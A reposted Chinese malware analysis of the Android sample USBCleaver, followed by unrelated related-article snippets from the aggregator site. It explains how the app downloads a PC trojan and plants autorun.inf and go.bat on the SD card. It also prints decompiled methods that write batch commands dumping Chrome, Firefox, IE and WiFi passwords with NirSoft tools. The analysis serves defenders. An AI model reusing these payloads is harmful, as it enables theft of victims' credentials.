【Android病毒分析报告】 - Usbcleaver

2023-05-16

本文章由Jack_Jia编写，转载请注明出处。
文章链接：http://blog.csdn.net/jiazhijun/article/details/9179749

作者：Jack_Jia 邮箱：309zhijun@163.com

一、病毒样本基本信息

Md5:283d16309a5a35a13f8fa4c5e1ae01b1

Package:com.novaspirit.usbcleaver

二、病毒代码分析

1、查看AndroidMainfest.xml文件

由清单文件可以看出，该恶意软件的入口点只有一个.USBCleaverActivity。

2、代码分析流程

代码树结构如下：

经过对程序唯一入口点的分析，恶意代码工作流程如下：

1、点击程序图标后运行USBCleaverActivity组件，该组件主要负责病毒运行环境的创建，如病毒所需目录结构。通过payloadHander完成autorun.inf文件写入（当以USB设备连接PC时，PC根据该文件配置运行go.bat），通过downloader完成对PC木马的下载。

2、downloader类负责PC木马压缩包的下载，下载后通过decompress完成PC木马压缩包解压

下载的PC木马压缩包信息如下：

3、payload通过payloadHandler产生go.bat，go.bat文件在autorun.info中配置运行。

  public String dumpChromePassword()
  {
    this.dumpChromePassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO +         [Dump Chrome PW]         + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\ChromePass.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log%  >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
    return this.dumpChromePassword;
  }

  public String dumpFFPassword()
  {
    this.dumpFFPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nEcho +----------------------------------+ >> %log% 2>&1\r\nEcho +         [Dump Firefox PW]        + >> %log% 2>&1\r\nEcho +----------------------------------+ >> %log% 2>&1\r\n%progdir%\\PasswordFox.exe  /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log%  >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
    return this.dumpFFPassword;
  }

  public String dumpIEPassword()
  {
    this.dumpIEPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO +           [Dump IE PW]           + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\iepv.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log%  >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
    return this.dumpIEPassword;
  }

  public String dumpSysInfo()
  {
    this.dumpSysInfo = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO +          [System info]           + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nIPCONFIG /all >> %log% 2>&1\r\n\r\n";
    return this.dumpSysInfo;
  }

  public String dumpWifiPassword()
  {
    this.dumpWifiPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO +          [Dump WIFI PW]          + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\WirelessKeyView.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log%  >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
    return this.dumpWifiPassword;
  }

go.bat文件内容就是执行下载PC木马的执行。到此PC平台木马的运行环境搭建完毕。当手持设备以USB模式连接PC后，PC木马即可成功运行。

三、病毒运行模型及恶意行为

Usbcleaver病毒运行时从服务器下载PC木马压缩包，并解压到SD卡，创建autorun.info和go.bat文件搭建PC木马运行环境。当手持设备以USB设备模式连接电脑后，下载的PC木马能够立即执行。

下载的PC木马能够窃取以下隐私信息：

1、Default gateway
2、DNS
3、Google Chrome password
4、Host name

5、IP address
6、Microsoft Internet Explorer password
7、Mozilla Firefox password
8、Physical address
9、Subnet mask
10、WiFi password

虽然该病毒目前感染量并不大，但是该病毒的运行模式及危害却应该引起安全人员的高度重视。通过移动设备感染PC设备这种方式以前也出现过（ http://blog.csdn.net/jiazhijun/article/details/8649473）。这种跨设备的病毒感染方式相对以前病毒具有更加精准的目的性。

目前短信认证码已经大量运用于电子商务和网银类网站。即使用户通过PC木马窃取了您网站的用户名和密码。但是涉及交易时需要输入动态的短信认证码，PC木马试图侵入到您的手机从而获取短信认证码的难度是相当大的。交易通道和认证信息的“独立双通道”是网上交易安全大大增强。然后如果木马通过感染移动设备，今儿感染用户的PC设备。这样木马就完全控制了用户的交易通道和认证通道，整个交易流程完即刻被木马攻破。

五、相关链接

http://www.symantec.com/security_response/writeup.jsp?docid=2013-062010-1818-99

http://news.ccidnet.com/art/1032/20130625/5029495_1.html

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

【Android病毒分析报告】 - Usbcleaver 的相关文章

java菜鸟程序员2012年度总结——分享、收获与感恩并存

前言 xff1a 又是一年总结时啊本来总结打算前几天就该写的但由于一直在忙最后的期末考试 xff0c 今天终于考完了现在终于有时间来对这一年进行总一下了刚开始的时候想了半天不知道该用什么题目好想了想 xff0c 今年的博客一直围绕
C语言推箱子小游戏可重玩可选关保存记录

转载请保留此行 xff0c 来自Vic 这是DLNU大一的题目 xff0c 估计我发上来后 xff0c 这个课题的难度大大降低可以随意增加地图根据20 20的画就行 0 可移动 1 墙 2 目的地 3 箱子 5 玩家记得也要增加存在
C/C++ 获得键盘按键代码

写推箱子小游戏的时候需要读取键盘写了个快速获得代码的小程序 include lt iostream gt include lt conio h gt int main int a while 1 a 61 getch std cout l
C语言中的转义字符

C语言中的转义字符简介在字符集中 xff0c 有一类字符具有这样的特性 xff1a 当从键盘上输入这个字符时 xff0c 显示器上就可以显示这个字符 xff0c 即输入什么就显示什么这类字符称为可显示字符 xff0c 如a b c 4
Eclipse:全局搜索和更替

Eclipse 中全局搜索和更替 Eclipse 全局搜索步骤使用快捷键 ctrl 43 H 打开文件搜索对话框 xff0c 选择 File Search 标签 xff0c 在 Containing text 中输入你需要搜索的字符串 x
研发人员绩效评价常见误区

1 光环化 xff1a 将被评价人某一优点或缺点扩大 xff0c 以偏概全 xff0c 一好百好 xff0c 或一无是处 xff0c 凭个人印象评价下属 2 宽容化严格化 xff1a 评价人怕承担责任 xff0c 有意放松评价标准 xff
malloc分配的内存空间是连续的吗

1 linux内核管理内存空间的分配 xff0c 所有程序对内存空间的申请和其他操作 xff0c 最终都会交给内核来管理 2 linux实现的是虚拟内存系统 xff0c 对用户而言 xff0c 所有内存都是虚拟的 xff0c 也就是说程序
NLP参考资源

https antkillerfarm github io NLP参考资源 https mp weixin qq com s 4eyxX EfrImGXnYmTRUFHw 自然语言处理 NLP 入门指南 https www geekhub
一个很有趣的问题：那些用QQ邮箱发应聘邮件的人啊(附：怎样写一封得体的电子邮件)...

最近这个话题频频出现 xff0c 而且讨论地越来越激烈 xff0c 也越来越有趣最开始是在人人网上当做笑口被大家广为扩散的那张图片 xff0c 某大学在申请出国联系导师的时候使用数字 64 qq com的邮箱 xff1b 之后又有了如下
linux（边压缩边传输边解压）

比如我要转移旧VPS home wwwroot 下的web目录到新VPS 123 123 123 123 的 home wwwroot 目录下 1 进入目录 cd home wwwroot 2 压缩 xff0c 传输 xff0c 解压同步进
让Editplus和SVN集成

很多人用Editplus xff0c 但是修改了文件后 xff0c 需要切换到文件目录 xff0c 点击鼠标右键使用TortoiseSVN的提交菜单项来提交 xff0c 需要增加很多鼠标点击和确认的操作 xff0c 对于频繁修改的文件来说
服务器是否支持断点续传

通常情况下 xff0c Web服务器如Apache 会默认开启对断点续传的支持因此 xff0c 如果直接通过Web服务器来提供文件的下载 xff0c 可以不必做特别的配置 xff0c 即可享受到断点续传的好处断点续传是在发起HTTP请
git-cola

http git cola github io downloads html you can get a binary git cola https github com git cola git cola archive v2 3 tar
北邮IT类就业攻略

发信人 noobody everybody 信区 Job 标题北邮IT类就业攻略发信站北邮人论坛 Sun Sep 6 12 16 28 2009 站内不久前发了那篇盘点IT类就业方向的文章 xff0c 感受到了师弟师妹们对找工
Android开发又将带来新一轮热潮，很多开发者都投入到这个浪潮中去了，创造了许许多多相当优秀的...

Android开发又将带来新一轮热潮 xff0c 很多开发者都投入到这个浪潮中去了 xff0c 创造了许许多多相当优秀的应用其中也有许许多多的开发者提供了应用开源项目 xff0c 贡献出他们的智慧和创造力学习开源代码是掌握技术的一
关于Java加密扩展的出口限制

近日 xff0c 在Matrix Security版上 http www matrix org cn thread shtml topicId 61 39543 amp forumId 61 55 提出一个问题 xff0c 即他的程序不能正
Win7 USB接口无法使用/驱动错误/该设备无法启动。(代码10) 故障解决方法

电脑USB接口突然有一个不能用了 xff0c 开始以为是驱动问题 xff0c 可是用好几个驱动软件 xff08 驱动精灵驱动人生等 xff09 更新驱动都无法解决 xff0c 后来发现在设备管理器里有一个设备驱动有问题 xff0c 尝试卸
Linux操作手册

Linux操作手册查看防火墙是否开启 systemctl status firewalld 开启防火墙 systemctl start firewalld 关闭防火墙 systemctl stop firewalld 查看所有开启的端口
【转】实现电子词典要解决的技术问题及初步的解答

转自 url http www blogjava net nokiaguy archive 2010 07 31 327623 html url quote 英文词典是手机中经常使用的应用因此 xff0c 在本文将结合Android来讨论

随机推荐

关于I2C和SPI总线协议

关于I2C和SPI总线协议 IICvs SPI 现今 xff0c 在低端数字通信应用领域 xff0c 我们随处可见IIC Inter Integrated Circuit 和 SPI Serial Peripheral Interface
strchr()、strrchr()、strchrnul()函数

原文链接 xff1a http blog sina com cn s blog 8b745a5f01017t8b html 头文件 xff1a include 函数原型 xff1a char strchr char str int c ch
面向对象编程之分层思想

分层 xff1a 就是为了忽略细节 xff0c 关注自己需要关注的地方 1 实体层 xff1a 分析模块所要设计的表 xff0c 确定表之间的关系 gt 编写hibernate Mapping 文件和持久化实体类 2 DAO层 xff1a
Linux_apt-get remove 与 apt-get autoremove、aptitude remove的不同

apt get remove 与 apt get autoremove aptitude remove 的不同 apt get remove 的行为我们很好理解 xff0c 就是删除某个包的同时 xff0c 删除依赖于它的包例如 xff1
再见，2011

2011 xff0c 又是匆匆的一年悄然回首 xff0c 得到的 xff0c 失去的 xff0c 欢乐的 xff0c 酸楚的 xff0c 每天都在交错即将过去的201一年注定不平凡的是一年 xff0c 是难忘的一年 xff0c 是蛋疼的
pptv web前端面试题答案

这是星期一考完试 xff0c 答应星期三补上的 xff0c 代码很简单 xff0c 就不写注释了 php快排 function quickSort amp arr arr left 61 new array arr right 61 new
Android初级教程_在电脑上共享手机屏幕

我们知道有的时候需要截取手机屏幕可以通过豌豆荚 91助手等工具第一这种方式在电脑上看到的手机屏幕比实际的要小第二需要安装此类软件有时候该类软件和eclipse开发Android的时候可能冲突连接不到adb 我们可以通过一下方式来
CMake 执行shell

使用cmake时 xff0c 可以在cmakelist txt中如下执行shell 一 xff0c 方法1 set LOG 34 log txt 34 add custom command OUTPUT LOG COMMAND echo 3
我对产品化的理解

我对产品化的理解产品化的时机是看业务的需要 xff0c 不管是对前景的落实 xff0c 还是项目转化成产品 xff0c 这些都不是技术人员能考虑的 xff0c 业务的发展和策划 xff0c 如何进行市场细化等如果都由技术人员考虑 xff0
PostMan中文设置

第一 xff0c 打开postman所在文件的位置查看自己的版本号第二 xff0c 打开下面的链接找到对应的版本号下载页面链接 xff1a https gitee com hlmd PostmanCn releases 下载好后回到p
Ubuntu下构建PX4软件

本搭建过程基于http dev px4 io starting building html xff0c 希望大家互相交流学习原文 xff1a Building PX4 Software xff08 构建PX4软件 xff09 PX4 ca
什么是scrum中的3355？

3355表示的是3个核心角色 xff0c 3个工件 xff0c 5个关键事件以及5大价值观 3个工件 xff1a 产品Backlog Sprint Backlog 潜在可交付软件增量 3个核心角色 xff1a 产品负责人 xff08 PO
sockaddr_in , sockaddr , in_addr区别Socket编程函数集（非常有用）

一 sockaddr和sockaddr in在字节长度上都为16个BYTE xff0c 可以进行转换 struct sockaddr unsigned short sa family 2 char sa data 14 14 上面是通用的s
Java多线程编程学习笔记之十二：生产者—消费者模型（含代码）

转载请注明出处 xff1a http blog csdn net ns code article details 17249321 生产者消费者问题是线程模型中的经典问题 xff1a 生产者和消费者在同一时间段内共用同一存储空间 xff0c
读《大数据时代》后的一些感想

最近快速阅读了大数据时代后写下自己的一些感想 xff0c 自己也稍微清楚大数据这个概念吧 xff01 随着2012年云技术的迅速发展 xff0c 大数据也紧跟其后出现了 xff0c 而且近期受到许多行业的关注几乎稍微有在网上逛逛的都
程序人生之一：一个四年 JAVA 程序员的工作经历

程序人生之一 xff1a 一个四年 JAVA 程序员的工作经历很感谢 CSDN 网友liudonglovehemin 的这篇帖子 xff0c 真实记录了一个 Java 程序员的 4 年来在北京工作学习生活的成长之路此情此景 xff0
我人生的转折点

来到兄弟连差不多快两周的时间了 xff0c 在这里的每一天每天都觉得非常的充实 xff0c 来到这里才知道什么才做学习 xff0c 什么才叫只要努力了用功了 xff0c 用心了 xff0c 就会有成果就如第一次的测验 xff0c 每天都
Canal AdminGuide

背景先前开源了一个开源项目 xff1a 阿里巴巴开源项目基于mysql数据库binlog的增量订阅 amp 消费本文主要是介绍一下如何部署 amp 使用环境要求 1 操作系统 a 纯java开发 xff0c windows linu
【Android病毒分析报告】 - Usbcleaver

本文章由Jack Jia编写 xff0c 转载请注明出处文章链接 xff1a http blog csdn net jiazhijun article details 9179749 作者 xff1a Jack Jia 邮箱 xff1a

【Android病毒分析报告】 - Usbcleaver

【Android病毒分析报告】 - Usbcleaver 的相关文章

随机推荐

热门标签